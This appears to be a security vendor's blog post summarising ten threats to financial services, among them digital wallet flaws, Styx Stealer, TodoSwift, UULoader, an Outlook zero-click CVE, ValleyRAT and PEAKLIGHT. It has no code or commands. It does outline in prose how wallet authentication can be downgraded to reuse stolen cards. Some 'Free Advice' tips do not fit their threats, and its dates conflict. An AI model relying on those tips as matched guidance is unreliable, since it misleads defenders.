Product
Jake Trujillo
Aug 26, 2024
Note: These were the top 10 cyber threats to the Financial Services industry as of October 9th, 2024. To see the latest top 10 cyber threats to Financial Services, click here.
1. DigitalWalletSecurityFlaws
A series of vulnerabilities draining people's digital wallets.
Summary: Vulnerabilities in digital wallets like Apple Pay, Google Pay, and PayPal could allow transactions with stolen and canceled credit cards. Attackers can downgrade the authentication process between the issuing bank and the digital wallet by opting for knowledge-based authentication (KBA) over multi-factor authentication (MFA), using easily obtainable personal information like addresses or the last four digits of a social security number. Even if a card is canceled, the token issued by the bank for authentication remains active in the digital wallet and is associated with the replacement card. This flaw also extends to recurring transactions, which can be abused by labeling one-time payments as recurring, allowing them to be processed even if the payment card is locked.
Free Advice: Implement immediate alerts for any changes or additions to digital wallet information to detect unauthorized activity quickly.
2. Phemedrone
A threat actor that got busted.
Summary: A new information stealing malware tool called Styx Stealer, or Phemedrone, was identified due to an operational security mistake by the threat actor. The error involved leaking data from the developer's computer during debugging, which revealed personal details such as Telegram accounts, contacts, emails, and cryptocurrency transactions.
Styx Stealer targets data from browsers, cryptocurrency wallets, and system information. It uses evasion techniques and does not execute in certain countries, including Russia and Ukraine.
Free Advice: Disable or restrict the use of Telegram and Discord on work devices if not required for business operations, as these platforms were mentioned as vectors for data exfiltration.
3. Lazarus
A notorious North Korean threat group.
Summary: North Korean cybercriminals, specifically the Lazarus subgroup BlueNoroff, have developed a sophisticated macOS malware named "TodoSwift," disguised as a legitimate application called "TodoTasks." It targets macOS users by masquerading as a PDF document offering insights into Bitcoin prices, exploiting the global interest in cryptocurrency. Once executed, the application downloads and runs a malicious binary in the background, potentially compromising the user's system.
Free Advice: Update all npm packages to their latest versions and apply any available security patches.
4. UULoader
A malware payload that unfurls in multiple steps.
Summary: New malware called UULoader is being used to distribute Gh0st RAT and Mimikatz by masquerading as legitimate application installers targeting Chinese and Korean users. UULoader contains an archive file with two main executables lacking file headers, one of which facilitates DLL file side-loading to deliver the final-stage payloads. The malware also executes a decoy file that appears to be a legitimate update, such as a Chrome update, to deceive users.
Free Advice: Implement Software Whitelisting: Temporarily restrict the installation of new software on macOS devices to applications vetted and approved by the IT department.
5. CVE-2024-38021
A flaw that can do serious damage without any clicks.
Summary: A critical zero-click flaw in Microsoft Outlook, CVE-2024-38021, arises from the way Outlook processes hyperlink objects within image tags in emails, specifically through the unsafe parsing of composite monikers by the MkParseDisplayName function. Despite Microsoft's efforts to mitigate a similar flaw (CVE-2024-21413) by implementing a security flag, the flag wasn't utilized, leaving systems vulnerable to remote code execution and NTLM credential leakage without requiring any user interaction beyond viewing an email.
Free Advice: Immediately apply the Microsoft update KB5040434 to all Windows systems to patch the CVE-2024-38021 vulnerability.
6. ValleyRAT
A RAT that is hard to track down.
Summary: An ongoing cyber campaign deploying ValleyRAT malware is specifically targeting Chinese-speaking individuals within finance. It employs shellcode for direct memory execution, significantly reducing its detectability. The initial infection vector involves masquerading as legitimate software, using familiar icons and filenames related to financial documents to deceive users into executing the malware. Once activated, ValleyRAT ensures it's the sole instance running, cleans up potential traces of previous infections, and stores C2 server details in the Windows registry. It employs evasion tactics like checking for virtual machine environments to avoid analysis and uses sleep obfuscation and XOR encoding to complicate detection.
Free Advice: Disable Microsoft Office macros and ensure that all Microsoft Office applications are updated to patch known vulnerabilities like CVE-2017-0199 and CVE-2017-11882.
7. SpyBanker
A financial phishing campaign.
Summary: A new phishing method targeting both Android and iPhone users was observed in a campaign against clients of a major Czech bank. This method involves the installation of phishing applications that mimic legitimate banking apps without requiring users to enable third-party app installations. For Android devices, this results in the silent installation of APKs that appear to originate from the Google Play Store. iOS users are tricked into adding a Progressive Web Application (PWA) to their home screen, which closely resembles the genuine banking application. These PWAs are essentially websites that operate like standalone applications, utilizing native system prompts to enhance their legitimacy.
Free Advice: Block or restrict access to third-party app stores and unverified websites on company devices.
8. Peaklight
Pirate a movie, and you might just download a hidden sequel: Malware.
Summary: A sophisticated new malware named PEAKLIGHT is distributed through pirated movie files. This memory-only dropper initiates a multi-stage infection process that is difficult to detect due to its evasion techniques and lack of disk footprint. The infection starts when users download pirated movies that are actually malicious ZIP files containing Microsoft Shortcut Files (LNK). These LNK files execute a PowerShell script to download further malicious content. The malware exhibits complex obfuscation techniques to hide its activities and comes in different variations, each targeting different directories and employing unique execution logic.
Free Advice: Block known malicious domains and IP addresses associated with PEAKLIGHT at the firewall or web proxy level to prevent communication with command and control (C2) servers.
9. Cheana
An imposter VPN.
Summary: A phishing campaign is impersonating a legitimate VPN provider, "WarpVPN," with a fake site that distributes malware known as "Cheana Stealer." The malware steals sensitive information and communicates with a command and control (C&C) server over HTTPS to exfiltrate the data. It steals info from the infected systems, including cryptocurrency-related browser extensions, standalone crypto wallets, stored browser passwords, browser login data, cookies, SSH keys, macOS passwords, and Keychain data. The campaign is linked to a Telegram channel with over 54,000 subscribers, which has been active since 2018 and is believed to have changed operators in 2021.
Free Advice: Enable Multi-Factor Authentication (MFA): For all critical systems and applications, especially those accessible from the internet, enable MFA to add an extra layer of security.
10. ZeroSevenGroup
A data breach exposing sensitive data from Toyota.
Summary: Toyota confirmed a data breach after the ZeroSevenGroup leaked 240GB of data stolen from its U.S. branch on a cybercrime forum. The leaked data included employee, customer, contract, and financial information. The data was apparently extracted from a backup server compromised on December 25, 2022.
Free Advice: Conduct an immediate security assessment to determine the extent of the breach and identify compromised systems.
Sign up for Fletch to get access more industry threats.
